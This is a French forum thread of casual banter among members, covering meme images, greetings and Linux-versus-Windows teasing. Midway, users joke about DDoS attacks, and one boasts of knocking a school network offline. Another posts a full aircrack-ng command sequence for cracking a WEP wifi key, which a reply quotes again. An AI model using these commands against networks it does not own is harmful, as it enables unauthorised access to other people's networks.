Le topic du printemps doux, fleuri et qui sent bon

  • Auteur de la discussion Auteur de la discussion MaladeMental
  • Date de début Date de début
ChapelierFou a dit:
Epsil a dit:
Linux, je vous dis.

Et comment tu fais tes attaques Doss avec ton nunusque hein ?
NewFag :mrgreen:
Technologically-Impaired-Duck-piracy-IS-communism-I-know-because-the-mpaa-told-me-on-tv.jpg
 
Mais tu serais presque quasi charmante-tssssssxeudeuspicépeutri-madmazelle.
Sans ce noir et blanc dégueulasse.
 
A prendre où à laisser par terre, je suis comme toutes les autres. :mrgreen:

edit : changée car l'autre était vraiment pas legit :D


==> pour DonFouinardo :
Advice-Dog-Fed-up-with-coffee-try-mdpv-.jpg
 
Lölilöl.

slowpokeinhale.th.png

Edit : Oh non. Je vais devoir réécouter ça maintenant. Too much oral defecation. POURQUOI POURQUOI. Dormir.
 
Et bah on va en récolter des sous, avec des contributions pareilles.
 
Epsil a dit:
Edit : Oh non. Je vais devoir réécouter ça maintenant. Too much oral defecation. POURQUOI POURQUOI. Dormir.

Cake and Sodomy ?

Il me reste un peu de cake... :mrgreen:

@Tiax : tu vois pas que je me prostitue pour payer le vBulletin là ?
 
ChapelierFou a dit:
@Tiax : tu vois pas que je me prostitue pour payer le vBulletin là ?

Ouf, pendant un moment j'ai bien crû que ce projet était mort-né, quel soulagement.
 
Tiax => Y'a aussi moyen de mettre en place un réseau de drogués pour aller faire la manche dans la rue. Vu le nombre de membres y'a moyen d'aller assez vite. :mrgreen:
 
Jeune__Peyotl a dit:
Il est même pu sur msn ni rien...

images


Et encore...mon firewall n'aime pas trop les irc...

Mais si l'on veut me joindre l'adresse msn est toujours valide. :)

Tiax a dit:
Boah je n'essaie même pas de rattraper le temps perdu...

D'ou k'il est "deleted"?

Opération?
bOobs?
CoOl.

J'faisais que passez, trop de taf tout ça.

Bonne route. A+

PS: Attaque DDOS?
A l'aise...
 
Guigz, bien content de te revoir \o/

T'as désactivé tes MP, du coup on peu plus te joindre de cette façons, et t'envoyer un mail voudrait dire que je dois au préalable rechercher ton adresse (ce qui ne serait pas très long mais bien chiant).

Je voulais t'envoyer une petite lettre de vacance y'a de ça un petit moment, vu que je pouvais plus te joindre je ne savais pas si c'était à cause d'un déménagement ou autre que tu ne trainais plus sur le net, donc si tu veux toujours la lettre (écrite mais plus d'actualité XD ), dis moi si tu est toujours à la bonne adresse et je te l'envoie :wink:
 
Don_Fouinardo a dit:
ChapelierFou a dit:
Epsil a dit:
Linux, je vous dis.

Et comment tu fais tes attaques Doss avec ton nunusque hein ?
NewFag :mrgreen:
Ett*****-**. Y'a même un GUI et tout pour script kiddie. Perso j'ai fait tomber le réseau de l'école en 10sec (ouais...) avec ça, sans le moindre besoin de connaissances. \o/

EDIT : Censure du nom du log. N'allons quand même pas trop donner de mauvaises idées... ^^'

J'allais le dire...t'es loin le chapelier.Linux Nbr one en sécurité,donc attaque,informatique.

[EDIT] Hey le pirate !
________________________________________________________________________________________________________________
Un être ne peut il pas être autre qu'il n'est.
Ride The Snake /To The Lake / The Ancient Lake
 
Putain, Guigz!

Moi qui croyait qu'il s'était fait couler au large de la Somalie en attaquant un pétrolier...

Bon bah tant pis, ça plus l'air d'un passage éclair que d'une réinstallation.
 
Bé grave !

airmon-ng start wlan0
airodump-ng -w save --encrypt wep wlan0
aireplay-ng -1-60 -e (essid) -b (bssid) -h (station) wlan0
(SUCCESFULL : )
aireplay-ng -3 -x 1000 -b (bssid) -h (station) wlan0
aircrack-ng -x -0 save-01.cap

5

Key Found !!! : )

Hop une clé WEP (à peu près hin ) .

Vas-y avec windows ou DOS...
________________________________________________________________________________________________________________
Un être ne peut il pas être autre qu'il n'est.
Ride The Snake /To The Lake / The Ancient Lake
 
Jeune__Peyotl a dit:
Bé grave !

airmon-ng start wlan0
airodump-ng -w save --encrypt wep wlan0
aireplay-ng -1-60 -e (essid) -b (bssid) -h (station) wlan0
(SUCCESFULL : )
aireplay-ng -3 -x 1000 -b (bssid) -h (station) wlan0
aircrack-ng -x -0 save-01.cap

5

Key Found !!! : )

Hop une clé WEP (à peu près hin ) .

Vas-y avec windows ou DOS...

Ah mais c'est tout à fait possible. Juste que ça met 3 heures au lieu de 10/30min.
Si si.

Bon après, la plupart des utilisateurs, soucieux de leur temps, se retrouvent face à un dilemme qui *peut* les pousser à utiliser un dual boot ou autre engeance de l'enfer.
Monde aride et cruel, et froid.


EDIT : TÏKPIÄK \o/
 
ToToro a dit:
Guigz, bien content de te revoir \o/

T'as désactivé tes MP, du coup on peu plus te joindre de cette façons, et t'envoyer un mail voudrait dire que je dois au préalable rechercher ton adresse (ce qui ne serait pas très long mais bien chiant).

Je voulais t'envoyer une petite lettre de vacance y'a de ça un petit moment, vu que je pouvais plus te joindre je ne savais pas si c'était à cause d'un déménagement ou autre que tu ne trainais plus sur le net, donc si tu veux toujours la lettre (écrite mais plus d'actualité XD ), dis moi si tu est toujours à la bonne adresse et je te l'envoie :wink:

Yop yop.
Desactiver les mp? Ah bon, je vais voir ca.

Ca va, et toi?
Toujours à la même adresse...Je suis super deçu de ne pas avoir recu ta carte postale :/ >< : )

Sinon les sales geeks aurait pu me prevenir que le surf sans interface graphique via lynx ou links c'est moins cool...et moins facile, j'suis passez deux trois fois avec cette config, même pas réussi a poster un msg....
Bouley.

Xorg roule a donf maintenant ca va mieux.
 
Trouvé sur un (sky)blog :
Voir la pièce jointe 4357

Tous les poncifs y passent!
La rose qui éclot, quel meilleur symbole pour évoquer la disparition de l'être cher.
 
Cey surtout les flammes qui craignent et le coté joyeux de l'hommage qui prédomine.
Ca fait un peu "yeepeee l'heritage :bear: "
 
Retour
Haut